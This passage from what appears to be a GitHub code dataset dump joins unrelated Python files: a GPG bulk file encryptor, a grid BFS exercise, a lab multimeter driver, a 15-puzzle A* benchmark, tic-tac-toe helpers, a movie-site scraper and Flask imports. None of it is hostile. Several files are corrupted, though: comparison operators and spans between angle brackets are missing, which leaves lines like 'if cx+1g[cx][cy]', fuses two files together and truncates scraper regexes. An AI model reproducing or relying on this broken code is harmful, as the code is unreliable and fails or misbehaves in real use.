files\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), path))\n log_file.flush()\n list_of_files = get_files(path)\n\n # Instantiate GPG class with agent use\n gpg = gnupg.GPG(use_agent=True)\n # Find matching keys\n matching_keys = gpg.list_keys(secret=True, keys=key_emails)\n\n # Verify the key provided is a secret key\n if matching_keys == []:\n now = datetime.datetime.now()\n error_msg = \"%s: FATAL ERROR! GPG secret key for %s not found in GPG agent!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), key_emails)\n log_file.write(error_msg + \"\\n\")\n log_file.flush()\n print(error_msg)\n log_file.close()\n sys.exit(1)\n\n # Begin encryption\n for file in list_of_files:\n # Do not attempt to encrypt already encrypted files\n if \".gpg\" not in file:\n now = datetime.datetime.now()\n log_message = \"%s: Encrypting %s so only %s can decrypt it!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file, key_emails)\n log_file.write(log_message + \"\\n\")\n log_file.flush()\n print(log_message)\n with open(file, 'rb') as plain_file:\n _ = gpg.encrypt_file( # Using that temporary discarded variable again\n file=plain_file,\n recipients=key_emails,\n armor=False,\n always_trust=True,\n output=file + \".gpg\")\n if delete_flag:\n now = datetime.datetime.now()\n log_message = \"%s: DELETING %s NOW THAT IT IS ENCRYPTED!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n log_file.write(log_message + \"\\n\")\n log_file.flush()\n print(log_message)\n os.remove(file)\n else:\n now = datetime.datetime.now()\n log_message = \"%s: Skipping %s because it's a .gpg file and \" \\\n \"is probably already encrypted!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n log_file.write(log_message + \"\\n\")\n log_file.flush()\n print(log_message)\n\n\n# Bulk Decrypt Files\ndef gpg_bulk_decrypt(delete_flag, path, log_file):\n \"\"\"This function recursively checks the path provided\n for all .gpg files and decrypts them\n\n Args:\n delete_flag: True or False flag to delete the original file when performing actions\n path: The path to a folder of files to perform bulk actions on\n log_file: The open log file that entries are written to\n\n \"\"\"\n now = datetime.datetime.now()\n log_file.write(\"%s: Scanning %s for files\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), path))\n log_file.flush()\n list_of_files = get_files(path)\n\n # Instantiate GPG class with agent use\n gpg = gnupg.GPG(use_agent=True)\n\n # Begin encryption\n for file in list_of_files:\n # Do not attempt to decrypt a non-encrypted file\n if \".gpg\" in file:\n now = datetime.datetime.now()\n log_message = \"%s: Decrypting %s!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n log_file.write(log_message + \"\\n\")\n log_file.flush()\n print(log_message)\n with open(file, 'rb') as encrypted_file:\n _ = gpg.decrypt_file( # Using that temporary discarded variable again\n file=encrypted_file,\n always_trust=True,\n output=file.replace(\".gpg\", \"\")\n )\n if delete_flag:\n now = datetime.datetime.now()\n log_message = \"%s: DELETING %s NOW THAT IT IS DECRYPTED!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n log_file.write(log_message + \"\\n\")\n log_file.flush()\n print(log_message)\n os.remove(file)\n else:\n now = datetime.datetime.now()\n log_message = \"%s: Skipping %s because it's not a .gpg file and \" \\\n \"is probably already decrypted!\" \\\n % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n log_file.write(log_message + \"\\n\")\n log_file.flush()\n print(log_message)\n\n\ndef main(action, key_emails, delete_flag, path):\n \"\"\"The main function where we start logging and call\n all other functions from\n\n Args:\n action: The action to perform (encrypt, or decrypt)\n key_emails: The list of email(s) belonging to the GPG key(s) involved\n delete_flag: True or False flag to delete the original file when performing actions\n path: The path to a folder of files to perform bulk actions on\n\n \"\"\"\n # First thing we do is open a log file for writing\n now = datetime.datetime.now()\n log_file_name = 'bulk_gpg_%s.log' % (now.strftime(\"%m%d%Y%H%M%S\"))\n log_file = open(log_file_name, 'a')\n actions_chosen = \"Run Configuration:\\n\" \\\n \"Action: %s\\n\" \\\n \"Path: %s\\n\" \\\n \"Encryption Key: %s\\n\" \\\n \"Delete Originals: %s\" % (action, path, key_emails, delete_flag)\n log_file.write(\"%s: Run starting.\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\")))\n log_file.write(\"%s: %s\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), actions_chosen))\n log_file.flush()\n if action == \"encrypt\":\n gpg_bulk_encrypt(key_emails, delete_flag, path, log_file)\n else:\n gpg_bulk_decrypt(delete_flag, path, log_file)\n log_file.close()\n sys.exit()\n\n\nif __name__ == '__main__':\n # This function parses and return arguments passed in\n # Assign description to the help doc\n PARSER = argparse.ArgumentParser(\n description='A simple Python script that allows you to encrypt/decrypt\\\n multiple files in a path without them being zipped into\\\n a single encrypted archive.')\n # Add arguments\n ACTION = PARSER.add_mutually_exclusive_group(required=True)\n ACTION.add_argument(\n '-e', '--encrypt', help=\"Encrypt files\", action='store_true'\n )\n ACTION.add_argument(\n '-d', '--decrypt', help=\"Decrypt files\", action='store_true'\n )\n PARSER.add_argument(\n '-p', '--path', type=str,\n help='path to directory to encrypt/decrypt', required=True)\n PARSER.add_argument(\n '--delete', help='Delete original files after actioned (Optional)',\n required=False, action='store_true')\n PARSER.add_argument(\n '-k', '--keyEmails', type=str, action='append',\n help='A GPG key email address to encrypt with.'\n 'You can specify this more than once.', required=False)\n # Array for all arguments passed to script\n ARGS = PARSER.parse_args()\n if ARGS.encrypt and ARGS.keyEmails is None:\n PARSER.error(\"-k/--keyEmail is required if you are encrypting\")\n # Assign args to variables\n if ARGS.encrypt:\n ARG_ACTION = \"encrypt\"\n else:\n ARG_ACTION = \"decrypt\"\n ARG_PATH = ARGS.path\n ARG_KEYS = ARGS.keyEmails\n ARG_DELETE = ARGS.delete\n main(ARG_ACTION, ARG_KEYS, ARG_DELETE, ARG_PATH)\n","repo_name":"ahrenstein/GPG-Bulk-File-Management","sub_path":"SourceCode/gpg_files_bulk_manage.py","file_name":"gpg_files_bulk_manage.py","file_ext":"py","file_size_in_byte":8720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"69947792109","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 24 14:39:40 2020\n\n@author: hihyun\n\"\"\"\n\ndef find(cur):\n cx,cy=cur\n c=[]\n #up\n if cx-1>=0:\n if g[cx-1][cy]>g[cx][cy]:\n c.append((cx-1,cy))\n #down\n if cx+1g[cx][cy]:\n c.append((cx+1,cy))\n #left\n if cy-1>=0:\n if g[cx][cy-1]>g[cx][cy]:\n c.append((cx,cy-1))\n #right\n if cy+1g[cx][cy]:\n c.append((cx,cy+1))\n return c\n \ndef bfs(cur):\n if memo[str(cur)]!=-1:\n return memo[str(cur)]\n \n else: \n q=[cur]\n c={str(cur):1}\n pre={str(cur):None}\n while len(q)!=0:\n cp=q.pop(0)\n if pre[str(cp)] is not None:\n c[str(cp)]=c[str(pre[str(cp)])]+1\n child=find(cp)\n for i in child:\n if memo[str(i)]!=-1:\n print('touch')\n c[str(i)]=c[str(cp)]+memo[str(i)]\n else:\n q.append(i)\n pre[str(i)]=cp\n memo[str(cur)]=max(list(c.values()))\n return memo[str(cur)]\n\n\n#f = open(\"./input.txt\", 'r')\n#num=int(f.readline().strip())\nnum=int(input())\ng=[]\nmemo={}\nfor idxi,i in enumerate(range(num)):\n #temp=list(map(int,f.readline().strip().split(' ')))\n temp=list(map(int,input().split(' ')))\n g.append(temp)\n for idxj,j in enumerate(temp):\n memo[str((idxi,idxj))]=-1\nfor i in memo.keys():\n print(i)\n if all([-1 None:\n super().__init__(address, **kwargs)\n self.factor = kwargs.get('factor', 1.0)\n self.nplc_default = 1 # power line cycles to average\n self.line_frequency = kwargs.get('line_frequency', float(50)) # Hz\n self.sample_count = self.get_sample_count()\n self.measure_time = self.set_measure_time()\n self.trigger_mode = self.get_trigger_source()\n\n def __del__(self) -> None:\n self.set_local()\n super().__del__()\n\n def set_mode(self, mode: str) -> None:\n \"\"\"\n set_mode(mode)\n\n mode: str, type of measurement to be done\n valid modes are: 'VDC', 'VAC', 'ADC', 'AAC', 'FREQ', 'OHMS',\n 'DIOD', 'CONT', 'PER'\n which correspond to DC voltage, AC voltage, DC current, AC current,\n frequency, resistence, diode voltage, continuity, and period\n respectively (not case sensitive)\n\n Configures the multimeter to perform the specified measurement\n \"\"\"\n\n mode = str(mode).upper()\n if not (mode in self.valid_modes):\n raise ValueError(\"Invalid mode option\")\n\n self.write_resource(f\"CONF:{self.valid_modes[mode]}\")\n\n def get_mode(self) -> str:\n \"\"\"\n get_mode()\n\n retrives type of measurement the multimeter is current configured to\n perform.\n\n returns: str\n \"\"\"\n\n response = self.query_resource(\"FUNC?\")\n return response.replace('\"', '')\n\n def get_error(self, **kwargs) -> str:\n \"\"\"\n get_error\n\n Returns:\n [list]: last error in the buffer\n \"\"\"\n response = self.query_resource('SYSTem:ERRor?', **kwargs)\n return self.resp_format(response, str)\n\n def set_trigger(self, trigger: str, **kwargs) -> None:\n \"\"\"\n set_trigger(trigger)\n\n Configures the multimeter to trigger as specified\n The TRIGger subsystem configures the triggering that controls\n measurement acquisition.\n Recommendation: All triggered measurements should be made using an\n appropriate fixed manual range. That is, turn autorange off\n ([SENSe:]:RANGe:AUTO OFF) or set a fixed range using the\n [SENSe:]:RANGe, CONFigure, or MEASure command.\n\n trigger: str, type of trigger to be done\n valid modes are: 'BUS', 'IMMEDIATE', 'EXTERNAL'.\n \"\"\"\n\n valid_delay = {'MIN', 'MINIMUM', 'MAX', 'MAXIMUM'}\n valid_count = {'MIN', 'MINIMUM', 'MAX', 'MAXIMUM', 'INF', 'INFINITE'}\n\n if kwargs.get('delay', False):\n\n if isinstance(kwargs['delay'], str):\n delay = kwargs['delay'].upper()\n else:\n delay = kwargs['delay']\n\n if not ((delay in valid_delay) or isinstance(delay, (int, float))):\n raise ValueError(f\"Invalid trigger delay. Use: {valid_delay}\")\n\n self.write_resource(f\"TRIG:DELay {delay}\")\n\n if kwargs.get('count', False):\n\n if isinstance(kwargs['count'], str):\n count = kwargs['count'].upper()\n else:\n count = kwargs['count']\n\n if not ((count in valid_count) or isinstance(count, int)):\n # note: if count is not an int the 2nd condition wont execute\n if not (isinstance(count, int) and (1 <= count <= 50000)):\n raise ValueError('Invalid trigger count.'\n f' Use: {valid_count} or an int within'\n ' the range [1, 50000]')\n\n self.write_resource(f\"TRIG:COUNt {count}\")\n\n trigger = trigger.upper()\n if trigger not in self.valid_trigger:\n raise ValueError(\"Invalid trigger option\")\n self.write_resource(f\"TRIG:{self.valid_trigger[trigger]}\")\n\n def set_trigger_source(self, trigger: str = 'IMMEDIATE', **kwargs) -> None:\n \"\"\"\n set_trigger(trigger)\n\n Configures the multimeter to trigger as specified\n\n trigger: str, type of trigger to be done\n valid modes are: 'BUS', 'IMMEDIATE', 'EXTERNAL'.\n \"\"\"\n\n trigger = str(trigger).upper()\n if trigger not in self.valid_trigger:\n raise ValueError(\"Invalid trigger option\")\n\n self.trigger_mode = self.valid_trigger[trigger]\n self.write_resource(f\"TRIG:SOUR {self.trigger_mode}\", **kwargs)\n\n def get_trigger_source(self, **kwargs) -> str:\n\n response = self.query_resource(\"TRIG:SOUR?\", **kwargs)\n fmt_resp = self.resp_format(response, str)\n\n self.trigger_mode = self.valid_trigger[fmt_resp]\n return self.trigger_mode\n\n def set_trigger_count(self, count: int, **kwargs) -> None:\n \"\"\"\n set_trigger_count(count)\n\n Args:\n count (int): how many readings to take when triggered\n \"\"\"\n valid_count = {'MIN', 'MINIMUM', 'MAX', 'MAXIMUM', 'INF', 'INFINITE'}\n\n count = count.upper() if isinstance(count, str) else count\n\n if not ((count in valid_count) or isinstance(count, int)):\n # note: if count is not an int the 2nd condition wont execute\n if isinstance(count, int) and (1 <= count <= 50000):\n pass\n else:\n raise ValueError('Invalid trigger count.'\n f' Use: {valid_count} or an int within'\n ' the range [1, 50000]')\n\n self.write_resource(f\"TRIG:COUNt {count}\", **kwargs)\n\n def get_trigger_count(self, **kwargs) -> int:\n response = self.query_resource(\"TRIG:COUN?\", **kwargs)\n return int(self.resp_format(response, float))\n\n def measure_voltage(self):\n \"\"\"\n measure_voltage()\n\n returns float, measurement in Volts DC\n\n Measure the voltage present at the DC voltage measurement terminals.\n If the meter is not configured to measure DC voltage this will raise an\n exception. This can be remedied by setting the meaurement mode with the\n set_mode method.\n\n \"\"\"\n if self.get_mode() != 'VOLT':\n raise IOError(\"Multimeter is not configured to measure voltage\")\n response = self.query_resource(\"MEAS:VOLT:DC?\")\n return self.factor*float(response)\n\n def measure_voltage_rms(self):\n \"\"\"\n measure_voltage_rms()\n\n returns float, measurement in Volts rms\n\n Measure the voltage present at the AC voltage measurement terminals.\n If the meter is not configured to measure AC voltage this will raise an\n exception. This can be remedied by setting the meaurement mode with the\n set_mode method.\n\n \"\"\"\n if self.get_mode() != 'VOLT:AC':\n raise IOError(\"Multimeter is not configured to measure AC voltage\")\n response = self.query_resource(\"MEAS:VOLT:AC?\")\n return self.factor*float(response)\n\n def measure_current(self):\n \"\"\"\n measure_current()\n\n returns float, measurement in Amperes DC\n\n Measure the current present through the DC current measurement\n terminals. If the meter is not configured to measure DC current this\n will raise an exception. This can be remedied by setting the meaurement\n mode with the set_mode method.\n\n \"\"\"\n if self.get_mode() != 'CURR':\n raise IOError(\"Multimeter is not configured to measure current\")\n response = self.query_resource(\"MEAS:CURR:DC?\")\n return self.factor*float(response)\n\n def measure_current_rms(self):\n \"\"\"\n measure_current_rms()\n\n returns float, measurement in Amperes rms\n\n Measure the current present through the AC current measurement\n terminals. If the meter is not configured to measure AC current this\n will raise an exception. This can be remedied by setting the meaurement\n mode with the set_mode method.\n\n \"\"\"\n if self.get_mode() != 'CURR:AC':\n raise IOError(\"Multimeter is not configured to measure AC current\")\n response = self.query_resource(\"MEAS:CURR:AC?\")\n return self.factor*float(response)\n\n def measure_resistance(self):\n \"\"\"\n measure_resistance()\n\n returns float, measurement in Ohms\n\n Measure the resistance present at the resistance measurement terminals.\n If the meter is not configured to measure resistance this will raise an\n exception. This can be remedied by setting the meaurement mode with the\n set_mode method.\n\n \"\"\"\n if self.get_mode() != 'RES':\n raise IOError(\"Multimeter is not configured to measure resistance\")\n response = self.query_resource(\"MEAS:RES?\")\n return float(response)\n\n def measure_frequency(self):\n \"\"\"\n measure_frequency()\n\n returns float, measurement in Hertz\n\n Measure the frequency present at the frequency measurement terminals.\n If the meter is not configured to measure frequency this will raise an\n exception. This can be remedied by setting the meaurement mode with the\n set_mode method.\n\n \"\"\"\n if self.get_mode() != 'FREQ':\n raise IOError(\"Multimeter is not configured to measure frequency\")\n response = self.query_resource(\"MEAS:FREQ?\")\n return float(response)\n\n def init(self, **kwargs) -> None:\n \"\"\"\n init(**kwargs)\n\n Initialize the meter, used with BUS trigger typically\n Use fetch_data (FETCh) to get the data.\n \"\"\"\n\n self.write_resource('INITiate', **kwargs)\n\n def fetch_data(self, **kwargs) -> float:\n \"\"\"\n fetch_data(**kwargs)\n\n Returns:\n [list, float]: data in meter memory resulting from all scans\n \"\"\"\n response = self.query_resource('FETC?', **kwargs)\n return self.resp_format(response, float)\n\n def abort(self, **kwargs) -> None:\n \"\"\"\n abort()\n\n Send VISA ABORt, stop the scan!!\n \"\"\"\n self.write_resource('ABORt', **kwargs)\n\n def trigger(self, wait: bool = True, **kwargs) -> None:\n \"\"\"\n trigger(wait=True)\n\n If the unit is setup to BUS trigger, sends trigger, otherwise pass\n If the unit is not setup to BUS trigger, it will log an error\n\n Args:\n wait (bool, optional): Does not return to caller until scantime\n is complete. Prevents Trigger Ignored\n errors (-211). Defaults to True.\n Returns:\n None\n \"\"\"\n\n if self.trigger_mode == self.valid_trigger['BUS']:\n self.write_resource('*TRG', **kwargs)\n else:\n print(f\"Trigger not configured, set as: {self.trigger_mode}\"\n f\" should be {self.valid_trigger['BUS']}\")\n\n if wait:\n sleep(self.measure_time) # should work most of the time.\n # it should also wait nplc time per channel\n # need to make a function to track nplc time\n # if nplc is longer than 1, then this will fail, if shorter\n # then this will take way too long\n\n def set_sample_count(self, count: int, **kwargs) -> None:\n self.write_resource(f\"SAMP:COUN {count}\", **kwargs)\n\n def get_sample_count(self, **kwargs) -> int:\n response = self.query_resource(\"SAMP:COUN?\", **kwargs)\n self.sample_count = int(self.resp_format(response, float))\n return self.sample_count\n\n def config(self, mode: str = 'volt', acdc: str = 'dc',\n signal_range: str = 'auto', resolution=None,\n nplc=0.02, **kwargs) -> None:\n \"\"\"config_chan(#)\n\n Args:\n mode (str, optional): meter mode. Defaults to 'volt'.\n acdc (str, optional): ac or dc measurement setting.\n Defaults to 'dc'.\n signal_range (str, optional): measurement range. Defaults to 'auto'\n resolution (str, optional): 4.5, 5.5 or 6.5, if None uses nplc\n nplc is recommended because script\n timing is more deterministic.\n Defaults to None.\n nplc (float, optional): power line cycles to average.\n Defaults to 0.02.\n Kwargs:\n verbose (bool, optional): Whether or not the command message sent\n to the device is also printed to stdio.out, for debugging\n purposes. Defaults to False.\n \"\"\"\n\n valid_acdc = {'DC': ':DC',\n 'AC': ':AC'}\n\n mode = mode.upper()\n if mode not in self.valid_modes:\n raise ValueError(\"Invalid mode option\")\n mode = self.valid_modes[mode]\n\n usefreq = (mode == self.valid_modes['FREQ'])\n usecurrent = (mode == self.valid_modes['CURR'])\n useres = (mode == self.valid_modes['RES'])\n\n acdc = acdc.upper()\n if acdc not in valid_acdc:\n raise ValueError(\"Invalid acdc option\")\n acdc = valid_acdc[acdc] if not usefreq else ''\n\n # if range is not provided, cannot use nplc in CONF command\n signal_range = signal_range.upper()\n if signal_range == 'AUTO':\n signal_range = False\n\n try:\n if usecurrent and signal_range not in self.valid_cranges:\n raise ValueError('Invalid Current Range option')\n elif useres and signal_range not in self.valid_Rranges:\n raise ValueError('Invalid Resistance Range option')\n elif signal_range not in self.valid_ranges:\n raise ValueError('Invalid Range option')\n\n except ValueError:\n if kwargs.get('verbose', False):\n print(\"signal_range not in list, using max\")\n signal_range = 'MAX' # same as MAX for current\n\n nplc = str(nplc).upper()\n if not (nplc in self.nplc):\n raise ValueError(\"Invalid nplc option\")\n nplc = nplc if not usefreq else ''\n\n cmds = []\n if resolution and signal_range:\n cmds.append(f\"CONF:{mode}{acdc} {signal_range},{resolution}\")\n else:\n if signal_range:\n cmds.append(f\"CONF:{mode}{acdc} {signal_range}\")\n else:\n cmds.append(f\"CONF:{mode}{acdc}\")\n\n if (resolution or nplc) and (not usefreq):\n cmds.append(f\"SENS:{mode}{acdc}\"\n f\"{':RES ' if resolution else ':NPLC '}\"\n f\"{resolution if resolution else nplc}\")\n\n for cmd_str in cmds:\n if kwargs.get('verbose', False):\n print(cmd_str)\n self.write_resource(cmd_str, **kwargs)\n\n def resp_format(self, response: str,\n resp_type: type = int) -> Union[Any, List[Any]]:\n \"\"\"\n resp_format(response(str data), type(int/float/etc))\n\n Args:\n response (str): string of data to parse\n type (type, optional): what type to output. Defaults to int.\n\n Returns:\n list[type], or type: return is a list if more than 1 element\n otherwise returns the single element as type\n \"\"\"\n if '@' in response:\n start = response.find('@') # note this returns -1 if not found\n stop = -1\n else:\n start = -1\n stop = None\n # that works out OK because data needs to be parsed from the first\n # character anyway, so this is not an error, but I don't like\n # that it isn't explicitly trying to find the correct character\n response = list(map(resp_type, response[start+1:stop].split(',')))\n\n if len(response) == 1:\n return response[0]\n return response\n\n def set_measure_time(self, measure_time: float = None):\n if measure_time is None:\n self.measure_time = (self.sample_count * self.nplc_default *\n (1 / self.line_frequency) + 0.01)\n else:\n self.measure_time = measure_time\n return self.measure_time\n\n def set_local(self, **kwargs) -> None:\n self.write_resource(\"SYSTem:LOCal\", **kwargs)\n","repo_name":"AnnaGiasson/PythonEquipmentDrivers","sub_path":"pythonequipmentdrivers/multimeter/HP_34401A.py","file_name":"HP_34401A.py","file_ext":"py","file_size_in_byte":19173,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"21539645892","text":"from .Function import *\n\nclass Plus(Function):\n def __init__(self, name, info):\n Function.__init__(self, name, info)\n self.js = compiler.compile(readFile(\"export/templates/js/plus.js\"))\n\n def generate(self):\n data = {\n \"name\": self.name,\n \"left\": \"components.\" + self.params[\"left\"],\n \"right\": \"components.\" + self.params[\"right\"]\n }\n\n return {\n \"name\": \"method_\" + self.name,\n \"js\": self.js(data)\n }, self.triggers, [\"result\"]\n","repo_name":"ThierryDeruyttere/Appy-Server","sub_path":"export/exporter/functions/Plus.py","file_name":"Plus.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24962318656","text":"import time\nimport pandas as pd\nimport numpy as np\nfrom Game import Solver, Game\n\ngoal = Game()\ngoal.set_board([[1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n [13, 14, 15, 0],\n ])\n\nstart_positions = np.load(\"positions.npy\")\nstart_boards = []\nfor pos in start_positions:\n board = Game()\n board.set_board(pos.tolist())\n start_boards.append(board)\nstart_positions = start_boards\n\ntimes = []\naverageHeuristic = []\nclosedDfs = []\nclosedAStar = []\nlengths = []\n\n\nfor start in start_positions:\n solver = Solver()\n startTime = time.time()\n foundPath = list(solver.astar(start, goal))\n manhattanTime = time.time() - startTime\n print(manhattanTime)\n print(len(foundPath))\n times.append(manhattanTime)\n averageHeuristic.append(solver.get_average())\n closedDfs.append(solver.dfsVisted)\n closedAStar.append(solver.closedSize)\n lengths.append(len(foundPath))\n\ndata = {'Time': times, 'Average Heuristic': averageHeuristic,\n 'Expanded DFS': closedDfs, 'Expanded A*': closedAStar, 'Length': lengths}\n\ndf = pd.DataFrame(data)\ndf.to_csv(\"Regular.csv\")\n","repo_name":"YardenRokach/Lookahead-Closed-A-Star","sub_path":"RegularAStar.py","file_name":"RegularAStar.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16291617357","text":"from Tabuleiro.tabuleiro import Tabuleiro\nfrom Tabuleiro.jogador import Jogador\n\ndef MenuOpcoes() -> None:\n '''\n Imprimi na tela o menu de opções que o jogo possui\n :return: None\n '''\n print(\"\\t\\tJOGO DA VELHA\\n\")\n print(\"1 - Jogar contra outro Player\")\n print(\"2 - Jogar contra CPU\")\n print(\"3 - Personalizar jogo\")\n print(\"4 - Jogar CPU contra CPU\")\n print(\"5 - Sair\")\n\ndef JogarNovamente(tabuleiro: Tabuleiro, jogador1: Jogador, jogador2: Jogador)->int:\n '''\n Retorna '1' caso o jogador desejar jogar novamente, retorna '0' caso não.\n :return: Number int\n '''\n usuario = int(input(\"Deseja jogar novamente?\\n1 - Sim\\n2 - Não\\nVocê: \"))\n jogador1.ResetarMovimentos()\n jogador2.ResetarMovimentos()\n tabuleiro.ResetarCasas()\n return usuario","repo_name":"Elielson68/JogoDaVelha","sub_path":"Jogo/JogoController.py","file_name":"JogoController.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73051526187","text":"#!/usr/bin/python3\n\nfrom urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport sqlite3\nimport time\nimport random\nimport logging\nimport copy\n\nimport threading\nimport concurrent.futures\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n#import thread\n\ndatabase = \"database/test.db\"\nlinkFile = \"data/links.csv\"\n\ndatabaseConnection = sqlite3.connect(database)\ndbSql = databaseConnection.cursor();\n\nbaseLinkImage = 'https://www.themoviedb.org'\n\n# multithread implementation to drasticly improve speed\n# each position contains a dictionary with:\n# {cl: [], overview: overview, imageLink: imageLink, actor: []}\ncollectedData = []\nnotCollected = []\n\ndef CollectDataFor(cl):\n logger.info(\"Start collecting data for:\" + cl)\n cl = cl.split(',')\n linkToInfo = baseLinkImage + '/movie/' + str(cl[2])\n\n counter = 0\n triedSleep = 1\n while counter < 10:\n req = None\n webpage = None\n try:\n req = Request(linkToInfo, headers={'User-Agent': 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n except Exception as e:\n logger.error(\"HTTP ERROR OCURED: \" + str(e))\n errorCode = re.findall('\\d+', str(e))\n if len(errorCode) > 0 and int(errorCode[0]) == 429:\n if triedSleep > 2:\n logger.critical(\"CANT MAKE ANY MORE REQUESTS, EXITING\")\n databaseConnection.close()\n exit(0)\n triedSleep += 1\n logger.INFO(\"To many request trying to sleep for 10 seconds\")\n time.sleep(10*triedSleep)\n triedSleep = True\n else:\n counter = 10\n else:\n webSoup = BeautifulSoup(webpage, \"html.parser\")\n\n overview = webSoup.find_all(\"div\", {\"class\": \"overview\"})\n if len(overview) > 0:\n overview = re.findall(r'

(.*?)

', str(overview))[0]\n else:\n logger.warning(\"CANT FIND DATA FOR: \" + str(cl))\n return\n\n imageLink = webSoup.find_all(\"img\", {\"class\": \"poster\"})\n if len(imageLink) > 0:\n imageLink = baseLinkImage + str(re.findall(r'src=\"(.*?)\"', str(imageLink))[0])\n else:\n imageLink = None\n\n actor = webSoup.find_all(\"ol\", {\"class\": \"people\"})\n actor = re.findall(r'

.*(.*?).*

', str(actor))\n\n if len(overview) > 10:\n logger.info(\"Found info for \" + str(cl[0]))\n infoDict = {}\n infoDict[\"cl\"] = cl\n infoDict[\"overview\"] = overview\n infoDict[\"imageLink\"] = imageLink\n infoDict[\"actor\"] = actor\n collectedData.append(infoDict)\n counter = 10\n else:\n logger.info(\"Not found. Repeating id:\" + str(cl[0]) + ' - c:' + str(counter))\n counter += 1\n time.sleep(random.random()*2)\n if counter == 10:\n logger.warning(\"CANT FIND DATA FOR: \" + str(linkToInfo))\n\n\ndef InsertIntoDatabase():\n while collectedData:\n cData = collectedData.pop(0)\n logger.debug(str(cData))\n for tc in cData[\"actor\"]:\n if len(tc) > 1:\n tcId = dbSql.execute(\"SELECT id FROM actor WHERE name=?\", (tc,)).fetchall()\n if len(tcId) == 0:\n dbSql.execute(\"INSERT INTO actor(name) VALUES(?)\", (tc,))\n tcId = dbSql.execute(\"SELECT id FROM actor WHERE name=?\", (tc,)).fetchall()\n dbSql.execute(\"INSERT INTO movieActor(id_movie, id_actor) VALUES(?,?)\", (int(cData[\"cl\"][0]), int(tcId[0][0]),))\n\n dbSql.execute(\"UPDATE movie SET overview=?, image=? WHERE id=?\", (cData[\"overview\"], cData[\"imageLink\"], int(cData[\"cl\"][0]),))\n cMovie = dbSql.execute(\"SELECT title, overview FROM movie WHERE id=?\", (int(cData[\"cl\"][0]),)).fetchall()\n logger.info(\"Inserted additional data for movie: \" + str(cMovie[0][0]))\n\ndef alreadyInDatabase(cl):\n cl = cl.split(',')\n overview = dbSql.execute(\"SELECT overview FROM movie WHERE id=?\", (cl[0],)).fetchall()\n logger.debug(str(overview))\n if overview[0][0] is not None and len(overview[0][0]) > 25:\n return True\n return False\n\nmaxThreads = 5\nchunkCounter = 0\nmoviesLeft = 0\n\nwith open(linkFile, newline='') as cLink:\n moviedbId = re.sub(r'[^\\x00-\\x7f]',r' ', cLink.read())\n moviedbId = moviedbId.splitlines()\n moviedbId.pop(0)\n moviesLeft = len(moviedbId)\n\n chunks = [moviedbId[x:x+maxThreads] for x in range(0, len(moviedbId), maxThreads)]\n\n try:\n for chunk in chunks:\n #logger.debug(\"chunk data:\"+str(chunk))\n i = 0\n while i < len(chunk):\n if alreadyInDatabase(chunk[i]):\n del chunk[i]\n moviesLeft -= 1\n else:\n i += 1\n if len(chunk) > 0:\n logger.debug(\"Still no data:\"+str(chunk))\n if len(chunk) > 1:\n with concurrent.futures.ThreadPoolExecutor(max_workers=maxThreads) as executor:\n executor.map(CollectDataFor, chunk)\n else:\n CollectDataFor(chunk[0])\n InsertIntoDatabase()\n chunkCounter += len(chunk)\n print(\"Movies left:\", moviesLeft - chunkCounter)\n except Exception as e:\n logger.error(\"ERROR IN MAIN FUNCTION: \" + str(e))\n\n#closing conection\nlogger.info(\"Commited to database current changes\")\ndatabaseConnection.commit()\ndatabaseConnection.close()\n","repo_name":"itsmartagonzalez/Hunediam-Prime","sub_path":"initialSetup/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26536334404","text":"import os\n\nimport collections\n\nfrom flask import render_template, flash, redirect, request\nfrom wtforms import StringField\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField, SelectField, SelectMultipleField, IntegerField\nfrom wtforms.validators import DataRequired\n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport re\nimport spacy\nimport nltk\n#nltk.download('stopwords')\n#nltk.download('wordnet')\n#nltk.download('punkt')\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import sent_tokenize\n\nimport textblob\nfrom textblob import TextBlob\n\nfrom app import app\nfrom app.DataBaseManager import DataBaseManager\nfrom app.reader_input_helpers import get_input_text\nfrom app.TextCleaner import *\nfrom app.TextCleaner import word_counts_text_cleaner, entity_recognition_text_cleaner, sentiment_text_cleaner, handy_cleaner, kw_cleaner\nfrom app.TextToFrame import TextToFrame\nfrom app.TextFeatureEngineering import TextFeatureEngineering\nfrom app.text_statistics_helpers import text_values_counts_dict, select_n_most_occuring_phrases, text_sentiment, get_sentences_with_keyword, phrases_sentiment_in_respect_to_full_text\nfrom app.reader_output_text_helpers import sentences_to_spanned_html, 